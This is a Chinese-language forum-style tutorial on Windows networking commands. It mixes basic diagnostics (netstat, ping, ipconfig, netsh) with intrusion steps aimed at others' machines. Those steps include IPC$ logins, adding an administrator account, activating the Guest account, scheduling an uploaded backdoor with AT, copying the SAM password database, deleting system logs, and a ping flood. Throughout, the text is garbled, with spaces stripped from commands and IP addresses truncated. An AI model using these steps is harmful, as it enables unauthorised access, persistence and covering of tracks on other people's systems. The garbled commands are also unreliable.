网络常用基础知识大全

网络常用基础知识大全1）如何查看本机所开端口：

用netstat-a—n命令查看！

netstat结果显示有一些英文，简单说一下这些英文具体都代表什么:

LISTEN：侦听来自远方的TCP端口的连接请求

SYN-SENT：再发送连接请求后等待匹配的连接请求

SYN-RECEIVED：再收到和发送一个连接请求后等待对方对连接请求的确认

ESTABLISHED：代表一个打开的连接

FIN-WAIT-1：等待远程TCP连接中断请求，或先前的连接中断请求的确认

FIN-WAIT-2：从远程TCP等待连接中断请求

CLOSE-WAIT：等待从本地用户发来的连接中断请求

CLOSING：等待远程TCP对连接中断的确认

LAST-ACK：等待原来的发向远程TCP的连接中断请求的确认

TIME-WAIT：等待足够的时间以确保远程TCP接收到连接中断请求的确认

CLOSED：没有任何连接状态

2）如何获得一个IP地址的主机名？

利用ping-aip命令查看！第一行的pinging后面的『ip』前面的英文就是对方主机名！

同样道理，利用pingmachine_name也可以得到对方的ip

获得一个网站的ip地址的方法是：pingwww.***.com

比如想知道sohu的ip，就用ping/来查看就可以了

顺便说一句：如果返回：Replyfrom*.*.*.*:TTLexpiredintransit的话，呵呵，代表TTL（生命周期）在传输过程中过期.什么意思呢？我来解释一下！

导致这个问题出现的原因有两个：1）TTL值太小！TTL值小于你和对方主机之间经过的路由器数目。2）路由器数量太多，经过路由器的数量大于TTL值！

呵呵，其实这两点是一个意思！只不过说法不同而已！

3）如何查看本机的ip地址？

用ipconfig来查看就可以！

也可以再Windows中的开始菜单，运行中输入winipcfg，同样可以看到自己的ip

ipconfig命令后面如果加一个参数/all的话，可以得到更加详细的资料，比如DNS、网关等……

4）使用net命令的时候遇到一些错误代码，如何查看对应的错误信息？

用命令nethelpmsgerorr_code来查看就可以了

比如错误代码为：88

则查看命令为：nethelpmsg88下面有这个错误代码的中文显示！

5）利用telnet连接到对方主机上，想获得一些系统信息，用什么命令？

set命令可以很好的完成你所需要收集信息的任务的！

方法：再cmd下直接输入set（telnet对方主机以后，也是直接set就可以了～然后能够得到NNNNN多的信息）

这里，computername：呵呵，还用说么？主机名！

OS＝Windows_NT：操作系统的类型哦～

path＝C:\perl\bin\：（perl的解释器位置！）

systemDrive=c:操作系统盘符！

USERNAME=coldcrysky当前登陆使用机器的用户

……

（6）跟踪路由器的命令是什么？

tracert格式：tracertip

中间会列出所有经过的路由器列表！这些路由器如果是暴露再防火墙外面的话，还可以看到路由的IP哦～呵呵（这里又涉及到了另外一个问题：为什么要把路由放在防火墙后面？原因呢，主要有两点：1）保护路由器！因为现在越来越多的攻击和入侵已经开始瞄准路由器了～如果直接把路由暴露在外面，呵呵，是非常危险的！被DoS了就不好了啊～呵呵，所以要放在防火墙里面；2）为路由器减少负担！如果所有的过滤功能统统都压在路由器上面，呵呵，路由器的负担就太大了！）

当然，利用pathping也可以达到同样效果！格式与tracert一样！

7）简单介绍一下cookie！

cookie，又名小甜点。

它的作用：记录访问者的一些信息。例如利用cookie记录你所登陆这个网页的次数、登陆时曾经输入的信息……

最常见的是，大家再登陆论坛（邮箱）的时候，经常在输入第一个字母的时候，往往下面就显示出了所有在本机登陆过该论坛（邮箱）的用户名吧？呵呵，这个就是cookie的作用！

大家在Administrator的cookies目录中可以看到很多的记事本文档吧？这些都是cookie，虽然经过了加密，但是仔细查找的话，仍然能够看到一些敏感信息！况且现在也已经有了专门查看cookie的软件！利用这些软件，你的隐私将不保哦～

那么，如何清除cookie呢？一般情况下，可以在Internet选项中的常规选项卡中看到一个删除cookies的按钮，点击就可以清楚掉了～

除此以外，还要在internet选项中的内容选项卡中找到自动完成按钮，把里面的四项都选中！然后点击清除表单，清除密码～

然后到操作系统目录所在的分区中！进入Winnt（98为windows）目录（当然了，这些都是默认的目录！如果你安装的时候改名了，就对应的去相应目录）之后找到TemporaryInternetFiles目录（2000的目录在c:\Documentsandsettings\administrator\Localsettings\TemporaryInternetFiles）98直接到windows目录下找TemporaryInternetFiles就可以了～，找到这个文件夹后，打开！看到里面有NNNNNNNNNNNN多的文件了么？呵呵，这些是你浏览过的网页的记录（有的时候从网站上面看到漂亮的FLASH，可是不能保存怎么办？只要在线浏览一遍以后，断线到这里来找*.swf，之后依次打开查看的话，相信你会找到你所需要的FLASH的！），好了，跑题了～继续说：这些文件是网站的页面记录，直接删除就可以了！

另外，有没有彻底禁止cookie的方法呢？

呵呵，当然有了！在IE的Internet选项中，找到隐私选项卡！，把里面的滑块拖到最上面，边上写着：阻止所有cookie，呵呵，是不是？

另外一种方法：找到Windows目录下的cookies目录！把里面的txt文件全部删除！，最后应该只剩下一个index.dat文件！之后把这个文件夹设置成只读就可以了～

不过，禁止cookie后，大部分的论坛都无法正常登陆了啊！呵呵，到底禁止不禁止就看你自己的了～

8)ping不到，tracert不到，但是却能用nbtstat显示对方的一些信息，为什么？

因为tracert和ping命令使用的是ICMP协议！而nbtstat是通过对方的netbios端口来获得对方的主机信息的！使用的是UDP和TCP协议！如果对方仅仅只对ICMP协议做了禁止的话，那通过这个命令获得系统信息是正常的！

9）telnet上去后，如何给对方开共享？

开共享的命令如下：netsharec=c:\winnt\system返回共享成功

之后直接利用\\ip\c来访问对方的system目录了～删除共享用

sharec/del命令就可以了

10）如何判断对方的具体操作系统版本？

首先用ver命令查看对方的版本号！

如果是5.00.2195的话，为2K；5.1.2600为XP

从这里可以区分出来到底是2K还是XP了～下面进行更加具体的区分！

2K的pro和svr版本区分：

在telnet下，netshart查看启动的服务～如果对方开启了TerminalServices服务的话，基本上可以判断为svr以上的版本了～如果没有开启，则为pro！（具体方法有三种，因为前几天在论坛中我回复过暗界了～所以这里就不再重复了～）

XP的pro和home版的区分：

homeedition是无法安装iis的！所以，可以通过iis服务来判断到底是home版或者是pro了～

当然了，如果对方是pro，但是将iis删除（停用）的话，就没办法判断了～呵呵

11）上次说了ping的基本用法，这次谈谈ping的命令参数！

这个是本次问题集的重点部分！无论是小鸟还是老鸟，你们能保证你真的对这些参数了如指

掌么？恐怕都未必！还是好好看看吧！

这是TCP／IP协议中最有用的命令之一

它给另一个系统发送一系列的数据包，该系统本身又发回一个响应，这条实用程序对查找远

程主机很有用，它返回的结果表示是否能到达主机，宿主机发送一个返回数据包需要多长时

间。

Usage：ping［-t］［-a］［-ncount］［-lsize］［-f］［-iTTL］［-vTOS］

［-rcount］［-scount］［［-jhost-list］［-khost-list］］

［-wtimeout］destination-list

Options：

-tPingthespecifedhostuntilinterrupted.（除非人为中止，否则一直ping下去）

-aResolveaddressestohostnames.（把IP转为主机名）

-ncountNumberofechorequeststosend.（响应请求的数量）

-lsizeSendbuffersize.（封包的大小）

-fSetDon`tFragmentflaginpacket.（信息包中无碎片）

-iTTLTimeToLive.（时间）

-vTOSTypeOfService.（服务类型）

-rcountRecordrouteforcounthops.

-scountTimestampforcounthops.

-jhost-listLoosesourceroutealonghost-list.

-khost-listStrictsourceroutealonghost-list.（较严格的……唉，怎么译好……

算了，放着吧）

-wtimeoutTimeoutinmillisecondstowaitforeachreply.（timeout的时间）

比如大家可能都知道的一个命令#ping-f-s65000***.***.***.***或者前阶段大家所

谓ping死霉国佬时所用的命令（当然这样只会造成我方自己的网络阻塞）。

其实这个命令主要是用来看对方应答的速度，如果怎么ping得到的结果都是requesttime

out。那恐怕你根本就不用你去找这台主机了，它不在你的射程之内。

12）如何查看本机的DNS服务器？

ipconfig其实是可以的（呵呵，上次就介绍过这个命令），除此以外，还可以利用一个命令：

再cmd下输入netsh，进入到netsh>提示符，再输入：intip进入到interfaceip>然后

再次输入dump，这时候屏幕上出现当前连接的配置情况了

这里必须介绍一下netsh到底是作什么用的！这个命令比较复杂，他包含了很多的子命令，

所以这里只对部分命令进行讲解：

a）查看本机IP：首先键入netsh，再netsh>提示符下输入：interface回车之后：ip回

车再之后：showaddress回车这样，就可以看到当前连接的IP地址和子网掩码。（其实

这个命令不如ipconfig简单，也不如ipconfig/all全面）

b）修改网络配置：接着上面的命令，我们使用：setaddressname=“本地连接”source=static

addr=00mask=，这样就修改了当前的IP地址，用showaddress

来看看（或者用ipconfig）

c）显示一个完整的网络配置教本：

刚才说过，第一个命令显示的信息不如ipconfig/all全面，不用着急，netsh再打印显示

网络配置上，还是有自己的特色的！例如：再interfaceip>状态下输入：dump，会显示一

个清单，显示所有本地连接（不管你是否使用～）与netstat-an不完全一样！

这就是netsh的简单介绍和最基础的用法！希望大家能够掌握！还可以输入？来查看帮助！

（要在netsh>提示符下才能查看帮助啊～）

13）网络命令小结

A、NET命令：

IPC连接：格式netuse\\对方IP\ipc$"密码"user:"用户名"『建立IPC连接～』

netuse\\对方IP\ipc$/delete『断开连接～』

以下操作需要在连接到对方主机后才可进行！！！

netusercoldcryskyxyz/add『在连接的目标主机中加入一个用户名为COLDCRYSKY密

码为WYZ的用户』

netlocalgroupAdministratorcoldcrysky/add『把名为coldcrysky的用户加入ADMIN

组-以为着权限的提高啊！！！^_^』

netusez:\\对方IP\C$『把对方的C盘映射为本机的Z盘-可依照需要更改映射盘符！』

netstarttelnet『开启TELNET』

netuserguest/active:yes『激活GUEST』

netuserguestcoldcrysky『把GUEST密码改为COLDCRYSKY』

B、AT命令：

查看远程机时间：nettime\\对方IP

加入一项新任务：

at\\对方IP时间文件名『用来把自己上传的后门程序在制定时间运行，方便以后进入

肉鸡！』

C、TELNET命令：

telnet对方IP端口『作用不用我说了吧？？？』

D、FTP命令：

登陆：ftp对方网址（IP地址）

上传文件：get文件在本机完整路径对方文件存放完整路径

下载文件：put对方文件完整路径本机存放文件路径

E、COPY命令：

在建立连接后（尤其是IPC$连接后，很有用的命令哦～）

⑴copyindex.htm\\\c$\index.htm

『将本机index.htm文件复制到的C盘下，如果要放到对方的NT目录下，则把

C改为admin$』

⑵copy\\\admin\repair\sam_c:『将远程机数据库文件拷贝到本机C盘根目录

下』F、SET命令：

主要用于分析目标计算机的基本信息用！具体使用方法请查找相关文件！

G、NBTSTAT命令：

nbtstat-A对方IP（这个A大写）

『在其中显示前面的英文或数字就是计算机名称！当然，也可以利用PING-A对方ip的方

法来查看对方主机名！效果相同！！！』

H、SHUTDOWN命令：

『用来关闭对方NT服务的命令』格式如下：

shutdown\\IP地址t:20

『20秒后自动关闭对方NT服务！由于对对方机器影响较大，慎用！！！』

I、DIR命令：

还用我说么？大家是不是早就该掌握了？？？（不知道的还是查阅相关资料吧～～～）

J、ECHO命令：

echocoldcrysky>index.htm『用coldcrysky覆盖掉原INDEX.HTM中所有内容』

echocoldcrysky>>index.htm『把coldcrysky加入到index.htm中』

K、ATTRIB命令：

更改文件属性用，格式：

Attrib-rindex.htm『去掉只读属性』（＋-分别代表增加和减少）

L、DEL命令：

『删除日志的时候用！』

delc:\winnt\system32\logfiles\*.*

delc:\winnt\system32\config\*.evt

delc:\winnt\system32\dtclog\*.*

delc:\winnt\system32\*.log

delc:\winnt\system32\*.txt

delc:\winnt\*.txt

delc:\winnt\*.log

M、PING命令：

-t：ping制定IP，知道网络断开或按CTRLC结束！

-a：解释PINGIP的主机名

-ncount：发送count指定的ECHO数据包，默认为4个！

14）这里我必须（或者说不得不重新重申一个命令！不过说之前我要把这个命令的相关命

令稍微介绍一下！）

我要说的命令就是：开启服务和停止服务的netstartandnetstop

这两个命令大多数朋友已经很熟悉了吧？不过为了方便更多的菜鸟能看明白我要说的意思，

不用再看其他相关文章，所以我简单说两句：netstart是开启服务！那么，如何开启呢？

比如，我们这里要开启telnet服务，那就直接再2K的cmd下输入：netstarttelnet就

OK了～关闭一项服务的话，把start换成stop就OK了～不过这里必须要注意：你所关闭

的服务必须是已经开启的服务！！！好像是一句废话

OK，有了这个前提后，下面就继续介绍：那么，netstart和netstop到底能开启什么服

务？其实这点也不需要你强记，记住这个命令就可以了：nethelpstart和nethelpstop，

这两个会显示出你所能开启的服务有那些~~

这里比如我们查到了这个服务"CLIENTSERVICEFORNETWARE"，那么当这个命令使用net

start和netstop的时候，你必须在这项服务上面加上""，原因是因为这个服务名称中

带有空格！如果服务名称中不带空格，你可以不用带这个引号！！！这点是我强调的问题！大

家一定不要忘记了！『前些天看到S8S8.net的黑白新区中有人说netstart和netstop

后面的服务名必须带空格是错误的！明白原因了吧？』

15）系统自带的系统工具

其实无论大家从什么地方，什么方法找到一些好用的工具，都不如Windows自带的工具用着

方便（假设你区的地方正好不能上网，而你又没有准备好这些工具，那怎么办？呵呵，不用

着急，用好下面几个Windows自带的小工具，可以使你事半功倍！）

1、msinfo32.exe

位于C:\ProgramFiles\CommonFiles

MicrosoftShared\Msinfo\msinfo32.exe，显示计算机中的有关系统信息，可用其诊断、解

决计算机问题并查看远程系统所生成的系统报告。

2、drwatson.exe--这个工具给我特别的亲密感觉：第一次使用这个工具是在看了LK007

大哥给cool兄弟的回复以后，我马上试验～果然很有意思！LK007不愧是大哥！现在想起

来都佩服不已~~~

位于C:\Windows\drwatson.exe，当某个应用程序在运行过程中出错时，它就会将出错的

程序以及出错的内存地址一一记录下来，并保存为Windows的Drwatson子目录下的*.wlg

记录文件。

3、sfc.exe

位于C:\Windows\System\sfc.exe，用于自动搜索被改变、删除或损坏了的系统文件。

4、msconfig.exe

位于C:\Windows\System\msconfig.exe，通过修改启动方式以及启动时运行哪些应用程序

等系统配置，从而达到快速排除故障的目的。

5、scanreg.exe

位于C:\windows\command\scanreg.exe（DOS版本）及C:\windows\scanregw.exe（Windows

版本），用于检查、修复、备份以及还原系统注册表及相关配置文件的工具软件，防止因注

册表数据被破坏而导致的系统故障。

6、vcmui.exe

位于C:\Windows\vcmui.exe，在后台自动将被覆盖的驱动程序备份下来，当我们安装的新

驱动出错时可用它进行恢复。

7、winrep.exe

位于C:\Windows\winrep.exe，能自动收集有关系统信息并提示用户输入故障所在，帮我们

编写一篇完整的"求援"报告，并将其发送给有关技术维护人员，简化"求援"操作。

这七个Windows自带的小程序可以在开始菜单--运行中直接输入文件名（无需输入扩展名）

调出该程序！

16）再说几个非常简单实用的DOS命令（工具）：

A、fport.exe--查看那些端口都是那些程序使用的命令。

B、netstat-an--查看那些端口于外部的IP连接。比如这里显示：23XX.XX.XX.XX而你

又没有开23端口，那么，呵呵……还用我说么？

C、letmain.exe\\ip-admin-d--列出本机的administrators组的用户名查看是否有异

常。

D、pslist.exe--列出进程

E、pskill.exe--杀掉进程，有时候再任务管理器中无法终止程序，那就用这个工具来停止

进程。

F、login.exe--列出当前有那些用户登陆再你的机器上。

ping命令详解

ping[-t][-a][-ncount][-llength][-f][-ittl][-vtos][-rcount][-scount]

[[-jcomputer-list]|[-kcomputer-list]][-wtimeout]destination-list

Options:

-tPingthespecifiedhostuntilstopped.Toseestatisticsandcontinue-type

Control-Break;Tostop-typeControl-C.

不停的ping地方主机，直到你按下Control-C。

此功能没有什么特别的技巧，不过可以配合其他参数使用，将在下面提到。

-aResolveaddressestohostnames.

解析计算机NetBios名。

示例：C:＼>ping-a1

Pinging[1]with32bytesofdata:

Replyfrom1:bytes=32timeping-n508

Pinging8with32bytesofdata:

Replyfrom8:bytes=32time=50msTTL=241

Replyfrom8:bytes=32time=50msTTL=241

Replyfrom8:bytes=32time=50msTTL=241

Requesttimedout.

………………

Replyfrom8:bytes=32time=50msTTL=241

Replyfrom8:bytes=32time=50msTTL=241

Pingstatisticsfor8:

Packets:Sent=50,Received=48,Lost=2(4%loss),Approximateroundtriptimes

inmilli-seconds:

Minimum=40ms,Maximum=51ms,Average=46ms

从以上我就可以知道在给8发送50个数据包的过程当中，返回了48个，其中

有两个由于未知原因丢失，这48个数据包当中返回速度最快为40ms，最慢为51ms，平均速

度为46ms。

-lsizeSendbuffersize.

定义echo数据包大小。

在默认的情况下windows的ping发送的数据包大小为32byt，我们也可以自己定义它的大

小，但有一个大小的限制，就是最大只能发送65500byt，也许有人会问为什么要限制到

65500byt，因为Windows系列的系统都有一个安全漏洞（也许还包括其他系统）就是当向对

方一次发送的数据包大于或等于65532时，对方就很有可能挡机，所以微软公司为了解决这

一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制，但这个参数配

合其他参数以后危害依然非常强大，比如我们就可以通过配合-t参数来实现一个带有攻击

性的命令：（以下介绍带有危险性，仅用于试验，请勿轻易施于别人机器上，否则后果自负）

C:＼>ping-l65500-t1

Pinging1with65500bytesofdata:

Replyfrom1:bytes=65500timeping-n1-r901（发送一

个数据包，最多记录9个路由）

Pinging01with32bytesofdata:

Replyfrom01:bytes=32time=10msTTL=249

Route:87->

14->

0->

9->

49->

7->

01->

5